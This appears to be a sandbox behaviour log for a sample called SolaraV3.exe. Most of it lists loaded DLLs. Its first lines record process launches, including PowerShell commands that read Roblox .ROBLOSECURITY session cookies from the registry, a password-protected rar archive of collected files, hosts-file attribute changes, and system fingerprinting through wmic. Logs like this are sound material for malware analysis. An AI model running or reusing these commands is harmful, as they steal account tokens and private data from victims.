Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
